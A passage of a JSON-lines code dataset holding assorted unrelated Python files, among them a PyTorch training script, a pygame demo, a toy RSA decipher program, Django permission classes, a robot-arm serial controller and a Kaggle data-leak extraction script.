net.load_state_dict(torch.load('net-best_epoch-1_fm-0.7394933126157746.pth.tar'))\n\nif LOAD_TRAINED:\n net.load_state_dict(torch.load('net_final.pth.tar'))\n print('LOAD OK')\nelse:\n t_start = time.time()\n out_dic = train(n_epochs=50, net=net, criterion=criterion)\n t_end = time.time()\n print(out_dic)\n print('Elapsed time:')\n print(t_end - t_start)\n torch.save(net.state_dict(), 'net_final.pth.tar')\n print('SAVE OK')\n\n# -\n# Eval by plotting\nt_start = time.time()\nsave_test_results(test_dataset)\nt_end = time.time()\nprint('Elapsed time: {}'.format(t_end - t_start))","sub_path":"train_fresunet.py","file_name":"train_fresunet.py","file_ext":"py","file_size_in_byte":7709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"180066153","text":"from datetime import timezone, timedelta\n\n\ndef to_utc(when):\n utc = timezone(timedelta(hours=0))\n return when.astimezone(utc)\n\n\ndef minutes_since_equinox(when):\n b = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30]\n days = (sum(b[0:when.month]) + when.day - 81) % 365\n hours = when.hour % 24\n minutes = when.minute\n return days*1440 + hours*60 + minutes\n","sub_path":"utils/time.py","file_name":"time.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"587872259","text":"__author__ = 'catears'\n# Henrik 'catears' Adolfsson\n# henad221@student.liu.se\n\n\"\"\"\nExample context with balls that move randomly\n\"\"\"\n\nimport random\n\nfrom context import EmptyContext\n\n\ndef outside_l(circle):\n return circle['pos'][0] - circle['r'] <= 0\n\n\ndef outside_r(circle):\n return circle['pos'][0] + circle['r'] >= g.width\n\n\ndef outside_u(circle):\n return circle['pos'][1] - circle['r'] <= 0\n\n\ndef outside_d(circle):\n return circle['pos'][1] + circle['r'] >= g.height\n\n\ndef update_movement(circle):\n if outside_l(circle) and circle['movement'][0] < 0:\n circle['movement'][0] *= -1\n elif outside_r(circle) and circle['movement'][0] > 0:\n circle['movement'][0] *= -1\n\n if outside_u(circle) and circle['movement'][1] < 0:\n circle['movement'][1] *= -1\n elif outside_d(circle) and circle['movement'][1] > 0:\n circle['movement'][1] *= -1\n\n\ndef make_circle(a, b, c, e):\n return {\n 'color': a,\n 'pos': b,\n 'r': c,\n 'movement': e\n }\n\n\ndef make_random_circle():\n movement = [random.randint(-5, 5), random.randint(-5, 5)]\n r, gr, b = random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)\n radius = random.randint(20, 50)\n pos = [random.randint(10, g.width-(radius+10)), random.randint(10, g.height-(radius+10))]\n return make_circle((r,gr,b), pos, radius, movement)\n\n\n##########################################\n# Exported Context #\n##########################################\n\nimport pygame\nimport g\nimport polygon\n\n\nclass BallContext(EmptyContext):\n\n def __init__(self, *args, **kwargs):\n super(BallContext, self).__init__(*args, **kwargs)\n self.circles = [make_random_circle()]\n self.background = pygame.Surface(g.size)\n self.background.fill(g.background_rgb)\n\n def act(self, keymap):\n g.screen.blit(self.background, (0, 0))\n\n for circle in self.circles:\n\n circle['pos'][0] += circle['movement'][0]\n circle['pos'][1] += circle['movement'][1]\n \n if keymap.hold('u') and not outside_u(circle):\n circle['pos'][1] -= g.push_factor\n if keymap.hold('d') and not outside_d(circle):\n circle['pos'][1] += g.push_factor\n if keymap.hold('l') and not outside_l(circle):\n circle['pos'][0] -= g.push_factor\n if keymap.hold('r') and not outside_r(circle):\n circle['pos'][0] += g.push_factor\n\n update_movement(circle)\n pygame.draw.circle(g.screen, circle['color'], circle['pos'], circle['r'])\n \n if keymap.press('space'):\n self.circles.append(make_random_circle())\n\n if keymap.press('lshift'):\n keymap.set('switch')\n return polygon.PolygonContext()\n\n def setup(self):\n pass","sub_path":"example_contexts/circle.py","file_name":"circle.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"463848291","text":"from Android.fengzhuang.Android_Function import *\r\nfrom Android.fengzhuang.Android_FatherClass import *\r\nimport os\r\n\r\npackageName=readConfigInfo('uc','package')\r\nactivityName=readConfigInfo('uc','activity')\r\n'''指定输入法'''\r\ncommand2 ='adb shell ime set com.sohu.inputmethod.sogouoem/.SogouIME'\r\nos.system(command2)\r\ndriver =getDriver(packageName,activityName)\r\nf=Father(driver)\r\n\r\nwait(5)\r\n\r\nf.swipe_num(4)\r\n\r\n'''滑动后页面'''\r\nele_loc=(\"class name\",\"android.widget.LinearLayout\")\r\nlist=f.find_elements_loc(ele_loc)\r\nprint(len(list))\r\ncontents=driver.contexts\r\nprint(contents)\r\n#输入框\r\n\r\ninputTextBef_loc=(\"name\",\"搜索感兴趣的内容\")\r\ninputBefEle=f.find_element_loc(inputTextBef_loc)#跳转前输入框\r\ninputBefEle.click()\r\n\r\n'''跳转过后页面元素重新定位'''\r\nwait(4)\r\n\r\ninputTextAft_loc=(\"name\",\"搜索或输入网址\")\r\n# inputAftEle=f.find_element_loc(inputTextAft_loc)\r\n# inputAftEle.click()\r\n# wait(4)\r\n# driver.keyevent('45')\r\n# wait(2)\r\n# driver.keyevent('66')\r\n#\r\n\r\n# f.send_keys(inputTextAft_loc,'11111')\r\n\r\n\r\n\r\n","sub_path":"UIAutoTest-master/yoyotest/Android/Page/Page_UC.py","file_name":"Page_UC.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"466082391","text":"#!/usr/bin/env python\n\nimport random\nfrom utils import readFile, writeFile\n\n\n# Maior Divisor Comum de x e y\ndef gcd(x, y):\n if y == 0:\n return x\n else:\n return gcd(y, x % y)\n\n\n# Algoritmo Extendido de Euclide\n# Calcula os coeficientes, tal que: ax + by = gcd(a, b)\ndef xgcd(a, b):\n x, x1 = 0, 1\n y, y1 = 1, 0\n\n if a == 0:\n return b, x, y\n\n while b != 0:\n quotient = a // b\n a, b = b, a - quotient * b\n x1, x = x, x1 - quotient * x\n y1, y = y, y1 - quotient * y\n\n return a, x1, y1\n\n\ndef isPrime(x):\n if x == 2: # Se for 2, n é primo\n return True\n if x < 2 or x % 2 == 0:\n return False\n for n in range(3, int(x**0.5)+2, 2):\n if x % n == 0:\n return False\n return True\n\n\ndef calculateE(phi):\n while True:\n e = random.randrange(1, phi)\n g = gcd(e, phi)\n if g == 1:\n return e\n\n\ndef calculateD(e, phi):\n g, x, y = xgcd(e, phi)\n if x < 0:\n return x + phi\n else:\n return x\n\n\ndef createKeys(p, q):\n if not (isPrime(p) and isPrime(q)):\n raise ValueError(\"P e Q devem ser primos\")\n elif p == q:\n raise ValueError(\"P e Q não podem ser iguais\")\n\n n = p * q\n phi = (p-1)*(q-1)\n\n e = calculateE(phi)\n\n d = calculateD(e, phi)\n\n return f\"{e}\\n{n}\", f\"{d}\\n{n}\"\n\n\ndef decipher(ciphertext):\n private_key_path = \"./private-key.txt\"\n with open(private_key_path) as file:\n key = file.readline()\n n = file.readline()\n lines = ciphertext.split(\"\\n\")\n n_lines = len(lines)\n deciphered = \"\"\n for i in range(n_lines-1):\n line = lines[i]\n aux = int(line) ** int(key)\n c = aux % int(n)\n deciphered += chr(c)\n\n return deciphered\n\n\ndef main():\n print(\"\\n#===== Decifragem RSA =====#\")\n\n option = None\n while True:\n print(\"1 - Gerar Chaves\")\n print(\"2 - Decifrar Texto\")\n option = input(\"Escolha: \")\n if (option == \"1\"):\n # Criar chaves publicas e privadas\n print(\"#=== Gerando Chaves ===#\")\n public_key, private_key = createKeys(151, 139)\n\n writeFile(\"./public-key.txt\", public_key)\n writeFile(\"./private-key.txt\", private_key)\n print(f\"Chave pública escrita em public-key.txt\")\n print(f\"Chave privada escrita em private-key.txt\")\n break\n elif(option == \"2\"):\n cipher_text_path = input(\"Caminho do texto cifrado: \")\n cipher_text = readFile(cipher_text_path)\n deciphered_text = decipher(cipher_text)\n print(f\"Texto decifrado escrito para ./textos/texto-decifrado.txt\")\n writeFile(\"./textos/texto-decifrado.txt\", deciphered_text)\n break\n\n\nmain()\n","sub_path":"rsa/decipher.py","file_name":"decipher.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"649799376","text":"from rest_framework import permissions\nfrom rest_framework.relations import ManyRelatedField\n\nfrom django.http import QueryDict\n\nfrom workflow.models import *\nfrom indicators.models import *\nfrom formlibrary.models import *\n\n\nclass IsSuperUserBrowseableAPI(permissions.BasePermission):\n\n def has_permission(self, request, view):\n if request.user.is_authenticated():\n if view.__class__.__name__ == 'APIRootView':\n return request.user.is_superuser\n else:\n return True\n return False\n\n\nclass UserIsOwnerOrAdmin(permissions.BasePermission):\n\n def has_permission(self, request, view):\n if view.action == 'list':\n return request.user.is_authenticated()\n elif view.action == 'create':\n return True\n elif view.action in ['retrieve', 'update', 'partial_update', 'destroy']:\n return True\n else:\n return False\n\n def check_object_permission(self, user, obj):\n return (user and user.is_authenticated() and\n (user.is_staff or obj == user))\n\n def has_object_permission(self, request, view, obj):\n return self.check_object_permission(request.user, obj)\n\n\nclass IsOrgMember(permissions.BasePermission):\n def has_permission(self, request, view):\n if request.user.is_superuser:\n return True\n\n if view.action == 'create':\n user_org = request.user.tola_user.organization\n\n if 'organization' in request.data:\n org_serializer = view.serializer_class().get_fields()[\n 'organization']\n primitive_value = request.data.get('organization')\n org = org_serializer.run_validation(primitive_value)\n return org == user_org\n\n return True\n\n def has_object_permission(self, request, view, obj):\n \"\"\"\n Object level permissions are used to determine if a user\n should be allowed to act on a particular object\n \"\"\"\n\n if request.user.is_superuser:\n return True\n user_groups = request.user.groups.values_list('name', flat=True)\n org_admin = True if ROLE_ORGANIZATION_ADMIN in user_groups else False\n\n user_org = request.user.tola_user.organization\n try:\n if obj.__class__ in [Sector, ProjectType, SiteProfile, Frequency,\n FundCode, DisaggregationType, Level,\n ExternalService, StrategicObjective,\n StakeholderType, ProfileType, Contact,\n ApprovalType, Distribution, CustomForm,\n CodedField, IssueRegister, Award, Milestone,\n Portfolio, WorkflowLevel1]:\n return obj.organization == user_org\n elif obj.__class__ in [Objective, Beneficiary, Documentation,\n CollectedData, WorkflowLevel2,\n WorkflowLevel2Sort]:\n return obj.workflowlevel1.organization == user_org\n elif obj.__class__ in [Checklist, Budget, RiskRegister]:\n return obj.workflowlevel2.workflowlevel1.organization == \\\n user_org\n elif obj.__class__ in [Organization]:\n return obj == user_org\n elif obj.__class__ in [WorkflowTeam]:\n if org_admin:\n return obj.workflow_user.organization == user_org\n else:\n return obj.workflowlevel1.organization == user_org\n elif obj.__class__ in [Indicator]:\n return obj.workflowlevel1.filter(\n organization=user_org).exists()\n except AttributeError:\n pass\n return False\n\n\nclass AllowTolaRoles(permissions.BasePermission):\n def has_permission(self, request, view):\n if request.user.is_superuser:\n return True\n user_groups = request.user.groups.values_list('name', flat=True)\n\n queryset = self._queryset(view)\n model_cls = queryset.model\n if view.action == 'create':\n user_org = request.user.tola_user.organization\n\n if 'workflowlevel1' in request.data:\n wflvl1_serializer = view.serializer_class().get_fields()[\n 'workflowlevel1']\n\n # Check if the field is Many-To-Many or not\n if wflvl1_serializer.__class__ == ManyRelatedField and \\\n isinstance(request.data, QueryDict):\n primitive_value = request.data.getlist('workflowlevel1')\n else:\n primitive_value = request.data.get('workflowlevel1')\n\n # Get objects using their URLs\n wflvl1 = wflvl1_serializer.run_validation(primitive_value)\n\n # We use a list to fetch the program teams\n if not isinstance(wflvl1, list):\n wflvl1 = [wflvl1]\n team_groups = WorkflowTeam.objects.filter(\n workflow_user=request.user.tola_user,\n workflowlevel1__in=wflvl1).values_list(\n 'role__name', flat=True)\n\n if model_cls in [Contact, CustomForm, Documentation, Indicator,\n Level, CollectedData, Objective,\n WorkflowLevel2]:\n return ((ROLE_VIEW_ONLY not in team_groups or\n ROLE_ORGANIZATION_ADMIN in user_groups) and\n all(x.organization == user_org for x in wflvl1))\n elif model_cls is WorkflowTeam:\n return (((ROLE_VIEW_ONLY not in team_groups and\n ROLE_PROGRAM_TEAM not in team_groups) or\n ROLE_ORGANIZATION_ADMIN in user_groups) and\n all(x.organization == user_org for x in wflvl1))\n\n elif model_cls is Portfolio:\n return ROLE_ORGANIZATION_ADMIN in user_groups\n\n return True\n\n def _queryset(self, view):\n \"\"\"\n Return the queryset of the view\n :param view:\n :return: QuerySet\n \"\"\"\n assert hasattr(view, 'get_queryset') \\\n or getattr(view, 'queryset', None) is not None, (\n 'Cannot apply {} on a view that does not set '\n '`.queryset` or have a `.get_queryset()` method.'\n ).format(self.__class__.__name__)\n\n if hasattr(view, 'get_queryset'):\n queryset = view.get_queryset()\n assert queryset is not None, (\n '{}.get_queryset() returned None'.format(\n view.__class__.__name__)\n )\n return queryset\n return view.queryset\n\n def has_object_permission(self, request, view, obj):\n \"\"\"\n Object level permissions are used to determine if a user\n should be allowed to act on a particular object\n \"\"\"\n if request.user and request.user.is_authenticated():\n if request.user.is_superuser:\n return True\n user_groups = request.user.groups.values_list('name', flat=True)\n if ROLE_ORGANIZATION_ADMIN in user_groups:\n return True\n\n queryset = self._queryset(view)\n model_cls = queryset.model\n if model_cls is Portfolio:\n team_groups = WorkflowTeam.objects.filter(\n workflow_user=request.user.tola_user,\n workflowlevel1__portfolio=obj).values_list(\n 'role__name', flat=True)\n if ROLE_PROGRAM_ADMIN in team_groups or ROLE_PROGRAM_TEAM in \\\n team_groups:\n return view.action == 'retrieve'\n elif model_cls is WorkflowTeam:\n team_groups = WorkflowTeam.objects.filter(\n workflow_user=request.user.tola_user,\n workflowlevel1=obj.workflowlevel1).values_list(\n 'role__name', flat=True)\n if ROLE_PROGRAM_ADMIN in team_groups:\n return True\n else:\n return view.action == 'retrieve'\n elif model_cls is WorkflowLevel1:\n team_groups = WorkflowTeam.objects.filter(\n workflow_user=request.user.tola_user,\n workflowlevel1=obj).values_list(\n 'role__name', flat=True)\n if ROLE_PROGRAM_ADMIN in team_groups:\n return True\n elif ROLE_PROGRAM_TEAM in team_groups:\n return view.action != 'destroy'\n elif model_cls is Indicator:\n team_groups = WorkflowTeam.objects.filter(\n workflow_user=request.user.tola_user,\n workflowlevel1__indicator=obj).values_list(\n 'role__name', flat=True)\n if ROLE_PROGRAM_ADMIN in team_groups:\n return True\n elif ROLE_PROGRAM_TEAM in team_groups:\n return view.action != 'destroy'\n elif ROLE_VIEW_ONLY in team_groups:\n return view.action == 'retrieve'\n elif model_cls in [CollectedData, Level, WorkflowLevel2]:\n team_groups = WorkflowTeam.objects.filter(\n workflow_user=request.user.tola_user,\n workflowlevel1=obj.workflowlevel1).values_list(\n 'role__name', flat=True)\n if ROLE_PROGRAM_ADMIN in team_groups:\n return True\n elif ROLE_PROGRAM_TEAM in team_groups:\n return view.action != 'destroy'\n elif ROLE_VIEW_ONLY in team_groups:\n return view.action == 'retrieve'\n elif model_cls is CustomForm:\n if obj.created_by == request.user:\n if 'workflowlevel1' in request.data:\n serializer = view.serializer_class().get_fields()[\n 'workflowlevel1']\n wflvl1 = serializer.run_validation(request.data.get(\n 'workflowlevel1'))\n team_groups = WorkflowTeam.objects.filter(\n workflow_user=request.user.tola_user,\n workflowlevel1=wflvl1).values_list(\n 'role__name', flat=True)\n return ROLE_VIEW_ONLY not in team_groups\n return True\n else:\n return False\n else:\n return True\n\n return False\n","sub_path":"feed/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":10795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"564094761","text":"import simplejson as json\nimport json\n\nwith open('keys.json') as fileObject:\n\tfileContents = fileObject.read()\n\tr = json.loads(fileContents)\ndef trance(formatted):\n\tj=0\n\twhile True:\n\t\ta=r['values'][j]['from']\n\t\tif formatted in a:\n\t\t\tout=r['values'][j]['to']\n\t\t\t#print(r['values'][j]['to'])\n\t\t\treturn out\n\t\t\tbreak\n\t\tj+=1","sub_path":"ng_exceptions/translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"138632459","text":"from consolemenu import SelectionMenu\n\nimport model\nimport view\nimport scanner\n\n\nclass Controller:\n def __init__(self):\n self.model = model.Model()\n self.view = view.View()\n\n self.tables = list(model.TABLES.keys())\n\n def get_table_name(self, index):\n try:\n return self.tables[index]\n except IndexError:\n return None\n\n def show_start_menu(self, subtitle='', **kwargs):\n menu_options = self.tables + ['Знайти майстрів за типом процедур',\n 'Знайти процедури за типом клієнтів',\n 'Повнотекстовий пошук (слово не входить)',\n 'Повнотекстовий пошук (ціла фраза)',\n 'Створити 10 000 рандомних майстрів']\n next_steps = [self.show_table_menu] * len(self.tables) + [\n self.get_masters_by_procedures,\n self.get_procedure_by_client_type,\n self.fts_without_word,\n self.fts_phrase,\n self.create_random_masters\n ]\n menu = SelectionMenu(menu_options, subtitle=subtitle,\n title=\"Оберіть таблицю або дію:\")\n menu.show()\n\n index = menu.selected_option\n if index < len(menu_options):\n table_name = self.get_table_name(index)\n next_step = next_steps[index]\n try:\n next_step(table_name=table_name)\n except Exception as err:\n self.show_start_menu(subtitle=str(err))\n else:\n print('Пака!!!!')\n\n def show_table_menu(self, table_name, subtitle=''):\n next_steps = [self.get, self.insert, self.update, self.delete, self.show_start_menu]\n menu = SelectionMenu(\n ['GET', 'INSERT', 'UPDATE', 'DELETE'], subtitle=subtitle,\n title=f'Обрано таблицю `{table_name}`', exit_option_text='Назад', )\n menu.show()\n\n next_step = next_steps[menu.selected_option]\n next_step(table_name=table_name)\n\n def get(self, table_name):\n filter_by = scanner.input_dict(table_name, 'За чим фільтрувати запит? Залиште пустим щоб отримати всі рядки:')\n data = self.model.get(table_name, **filter_by)\n self.view.print_entities(table_name, data)\n scanner.press_enter()\n self.show_table_menu(table_name)\n\n def insert(self, table_name):\n new_values = scanner.input_dict(table_name, 'Введіть нові значення:')\n self.model.insert(table_name, **new_values)\n self.show_table_menu(table_name, 'Вставка відбулася успішно')\n\n def update(self, table_name):\n filter_by = scanner.input_dict(table_name, 'Який рядок треба змінити?:', limit=1)\n new_values = scanner.input_dict(table_name, 'Введіть нові значення:')\n self.model.update(table_name, list(filter_by.items())[0], **new_values)\n self.show_table_menu(table_name, 'Оновлення відбулося успішно')\n\n def delete(self, table_name):\n filter_by = scanner.input_dict(table_name, 'Які рядки треба видалити?')\n self.model.delete(table_name, **filter_by)\n self.show_table_menu(table_name, 'Видалення відбулося успішно')\n\n def get_masters_by_procedures(self, **kwargs):\n procedures = scanner.input_simple('Через кому введіть процедури:').split(',')\n procedures = [p.strip() for p in procedures]\n data = self.model.get_masters_by_procedures(procedures)\n self.view.print_entities(f'Майстри які робили процедури={procedures}', data)\n scanner.press_enter()\n self.show_start_menu()\n\n def get_procedure_by_client_type(self, **kwargs):\n is_vip = scanner.input_simple('Чи є клієнт ВІПом?').lower() in ('t', 'true', '+', 'yes', 'y')\n data = self.model.get_procedure_by_client_type(is_vip)\n self.view.print_entities(\n f'Процедури які робили клієнти віп={is_vip}', data)\n scanner.press_enter()\n self.show_start_menu()\n\n def fts_without_word(self, **kwargs):\n word = scanner.input_simple('Яке слово має бути відсутнє у документі?')\n data = self.model.fts_without_word(word)\n self.view.print_entities(f'Документи, в яких немає слова `{word}`', data)\n scanner.press_enter()\n self.show_start_menu()\n\n def fts_phrase(self, **kwargs):\n phrase = scanner.input_simple('Введіть фразу, за якою хочете здійснити повнотекстовий пошук:')\n data = self.model.fts_phrase(phrase)\n self.view.print_entities(f'Документи, в яких є фраза `{phrase}`', data)\n scanner.press_enter()\n self.show_start_menu()\n\n def create_random_masters(self, **kwargs):\n self.model.create_random_masters()\n self.show_start_menu('10 000 випадкових майстрів додано')\n","sub_path":"sem1/lab2/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":5423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"526441786","text":"import serial\nimport time\n\nclass Arm:\n\n def __init__(self):\n self.elapsed_time = 0\n self.ser = serial.Serial(\"/dev/ttyACM0\", 9600)\n self.arm_functions = {\n \"Base\" : {\n \"Right\" : {\n True : self.setBaseRightRotation,\n False : self.voidMethod\n },\n \"Left\" : {\n True : self.setBaseLeftRotation,\n False : self.voidMethod\n }\n },\n \"Shoulder\" : {\n \"Forward\" : {\n True : self.setShoulderForwardMovement,\n False : self.voidMethod\n },\n \"Backward\" : {\n True : self.setShoulderBackwardMovement,\n False : self.voidMethod\n }\n },\n \"Elbow\" : {\n \"Forward\" : {\n True : self.setElbowForwardMovement,\n False : self.voidMethod\n },\n \"Backward\" : {\n True : self.setElbowBackwardMovement,\n False : self.voidMethod\n }\n },\n \"Joint\" : {\n \"Forward\" : {\n True : self.setJointForwardMovement,\n False : self.voidMethod\n },\n \"Backward\" : {\n True : self.setJointBackwardMovement,\n False : self.voidMethod\n },\n },\n \"Wrist\" : {\n \"Right\" : {\n True : self.setWristRightRotation,\n False : self.voidMethod\n },\n \"Left\" : {\n True : self.setWristLeftRotation,\n False : self.voidMethod\n }\n },\n \"Plier\" : {\n \"Open\" : {\n True : self.setPlierOpen,\n False : self.voidMethod\n },\n \"Close\" : {\n True : self.setPLierClose,\n False : self.voidMethod\n }\n }\n }\n\n def processArmData(self, armData):\n if time.time() - self.elapsed_time < 0.025:\n return\n self.arm_functions[\"Base\"][\"Right\"][armData[\"Base\"][\"Right\"]]()\n self.arm_functions[\"Base\"][\"Left\"][armData[\"Base\"][\"Left\"]]()\n self.arm_functions[\"Shoulder\"][\"Forward\"][armData[\"Shoulder\"][\"Forward\"]]()\n self.arm_functions[\"Shoulder\"][\"Backward\"][armData[\"Shoulder\"][\"Backward\"]]()\n self.arm_functions[\"Elbow\"][\"Forward\"][armData[\"Elbow\"][\"Forward\"]]()\n self.arm_functions[\"Elbow\"][\"Backward\"][armData[\"Elbow\"][\"Backward\"]]()\n self.arm_functions[\"Joint\"][\"Forward\"][armData[\"Joint\"][\"Forward\"]]()\n self.arm_functions[\"Joint\"][\"Backward\"][armData[\"Joint\"][\"Backward\"]]()\n self.arm_functions[\"Wrist\"][\"Right\"][armData[\"Wrist\"][\"Right\"]]()\n self.arm_functions[\"Wrist\"][\"Left\"][armData[\"Wrist\"][\"Left\"]]()\n self.arm_functions[\"Plier\"][\"Open\"][armData[\"Plier\"][\"Open\"]]()\n self.arm_functions[\"Plier\"][\"Close\"][armData[\"Plier\"][\"Close\"]]()\n self.elapsed_time = time.time()\n\n def setBaseRightRotation(self):\n self.ser.write('A'.encode(\"ascii\"))\n\n def setBaseLeftRotation(self):\n self.ser.write('B'.encode(\"ascii\"))\n\n def setShoulderForwardMovement(self):\n self.ser.write('C'.encode(\"ascii\"))\n\n def setShoulderBackwardMovement(self):\n self.ser.write('D'.encode(\"ascii\"))\n\n def setElbowForwardMovement(self):\n self.ser.write('E'.encode(\"ascii\"))\n\n def setElbowBackwardMovement(self):\n self.ser.write('F'.encode(\"ascii\"))\n\n def setJointForwardMovement(self):\n self.ser.write('G'.encode(\"ascii\"))\n\n def setJointBackwardMovement(self):\n self.ser.write('H'.encode(\"ascii\"))\n\n def setWristRightRotation(self):\n self.ser.write('I'.encode(\"ascii\"))\n\n def setWristLeftRotation(self):\n self.ser.write('J'.encode(\"ascii\"))\n\n def setPlierOpen(self):\n self.ser.write('K'.encode(\"ascii\"))\n\n def setPLierClose(self):\n self.ser.write('L'.encode(\"ascii\"))\n\n def voidMethod(self):\n return\n","sub_path":"v2/Robot/Robot/Arm.py","file_name":"Arm.py","file_ext":"py","file_size_in_byte":4280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"7813687","text":"import turtle\nkor = turtle.Turtle()\nplocha = turtle.Screen()\nkor.speed(0)\ndef stvorecOdStredu(s):\n kor.penup()\n kor.forward(s/2)\n kor.left(90)\n kor.pendown()\n for i in range(4):\n kor.forward(s/2)\n kor.left(90)\n kor.forward(s/2)\n kor.penup()\n kor.left(-90)\n kor.backward(s/2)\n kor.pendown()\n\ndef sach(p):\n a = 1\n for i in range(p):\n a = a*(-1)\n if(a==-1):\n farba = 'black'\n else:\n farba = 'white'\n kor.begin_fill()\n kor.fillcolor(farba)\n stvorecOdStredu(50)\n kor.end_fill()\n kor.forward(50)\nsach(8)\nplocha.mainloop()","sub_path":"sachovnica.py","file_name":"sachovnica.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"204582616","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nCS224N 2019-20: Homework 5\n\"\"\"\n\nimport torch\nimport torch.nn as nn\n\nclass CNN(nn.Module):\n def __init__(self, i, f, k=5, p=1):\n super(CNN, self).__init__()\n self.input_features = i\n self.output_features = f\n self.kernel_size = k\n self.padding = p\n self.conv1d = nn.Conv1d(in_channels=self.input_features, out_channels=self.output_features, kernel_size=self.kernel_size, padding=self.padding)\n\n def forward(self, x_reshaped):\n x_conv = self.conv1d(x_reshaped)\n return x_conv\n\n# if __name__ == '__main__':\n# w_e_size = 10\n# e_char = 5\n# m_word = 12\n# model = CNN(e_char, w_e_size)\n# x_conv = torch.Tensor(16, e_char, m_word)\n# x_out = model(x_conv)\n# #\n# xx = x_out","sub_path":"Chapter10-Sequence-Modeling-Recurrent-and-Recursive Nets/CS224n/Class 5/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"309536069","text":"# full leak can be extracted with 10 GB memory\n# but you can extract a subset of leak if you have less memory\n# pypy leak.py takes 30 mins\n\nimport csv\nimport os\nimport sys\ncsv.field_size_limit(sys.maxsize)\n\nmemory = 20 # stands for 10GB, write your memory here\nlimit = 114434838 / 10 * memory \n\ntopic_set = set()\ndoc_topic_dict = {}\n# document_id,topic_id,confidence_level\n\nfor c, row in enumerate(csv.DictReader(open(\"../input_data/documents_topics.csv\"))):\n doc_id = int(row['document_id'])\n confidence_level = float(row['confidence_level'])\n if doc_id not in doc_topic_dict:\n doc_topic_dict[doc_id] = set()\n if confidence_level > 0.3:\n doc_topic_dict[doc_id].add(int(row['topic_id']))\n topic_set.add(row['topic_id'])\n \n\nleak = {}\nc = 0\nfor c,row in enumerate(csv.DictReader(open('../input_data/promoted_content.csv'))):\n if row['document_id'] != '':\n doc_id = int(row['document_id'])\n if doc_id in doc_topic_dict:\n for topic in doc_topic_dict[doc_id]:\n leak[topic] = 1\n else:\n c += 1\nprint(len(leak))\nprint(\"missing:\", c, len(doc_topic_dict))\nprint(\"topic:\", len(topic_set))\n\ncount = 0\nfilename = '../input_data/leak.csv'\n# uuid,document_id,timestamp,platform,geo_location,traffic_source\n# 1fd5f051fba643,120,31905835,1,RS,2\n# 8557aa9004be3b,120,32053104,1,VN>44,2\n# filename = '../input/page_views_sample.csv' # comment this out locally\nfor c,row in enumerate(csv.DictReader(open(filename))):\n # if count>limit:\n\t # break\n if c%1000 == 0:\n print (c,count)\n doc_id = int(row['document_id'])\n if doc_id not in doc_topic_dict:\n\t continue\n for topic_id in doc_topic_dict[doc_id]:\n if topic_id not in leak:\n continue\n if leak[topic_id] == 1:\n leak[topic_id] = set()\n lu = len(leak[topic_id])\n leak_set = set(row['uuid'].split(' '))\n leak[topic_id].update(leak_set)\n if lu != len(leak[topic_id]):\n count += len(leak_set)\n\nfo = open('../input_data/leak_topic.csv','w')\nfo.write('topic_id,uuid\\n')\nfor i in leak:\n if leak[i]!=1:\n\t tmp = list(leak[i])\n\t fo.write('%s,%s\\n'%(i,' '.join(tmp)))\n\t del tmp\nfo.close()\t","sub_path":"final/src/feature_extract/leak_topic2.py","file_name":"leak_topic2.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"238028579","text":"from django.contrib.comments.views.comments import post_comment\nfrom django.contrib.comments.models import Comment\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.shortcuts import render_to_response, get_object_or_404\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.core.urlresolvers import reverse\nfrom django.template.context import RequestContext\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.comments.models import Comment\nfrom django.contrib import comments\n\nfrom models import Question, Answer\nfrom django import forms\nfrom sa_voting.views import append_vote_dict\nfrom sa_voting.vote_obj_dict import vote_for_obj_dict\n\ndef get_country_list():\n from sa_content.models import CountryDetails\n temp = CountryDetails.objects.all()\n clist = [(key.id,key.name) for key in temp]\n clist.append((-1, 'Other'), )\n return clist\n\nclass QuestionForm(forms.ModelForm):\n def __init__( self, *args, **kwargs ):\n super( forms.ModelForm, self ).__init__( *args, **kwargs )\n fields = self.fields\n for each_field in fields.keys():\n if each_field == 'title':\n self.fields[each_field].widget.attrs={'class':'textfield2', 'value':'Type your Question Title Here', 'onfocus':\"hide_msg(this.id,'Type your Question Title Here')\", 'onblur':\"show_msg(this,'Type your Question Title Here')\"}\n self.fields[each_field].label = ''\n if each_field == 'body':\n self.fields[each_field].widget.attrs={'class':'textfield', 'cols':2, 'rows':2, 'onfocus':\"hide_msg(this.id,'Type your Questions here')\", 'onblur':\"show_msg(this,'Type your Questions here')\"}\n self.fields[each_field].label = ''\n self.fields[each_field].initial = 'Type your Questions here'\n self.fields.keyOrder = ( 'title', 'body', 'content_object')\n\n content_object = forms.ChoiceField(choices=get_country_list(),required=True, label='', widget=forms.Select(attrs = 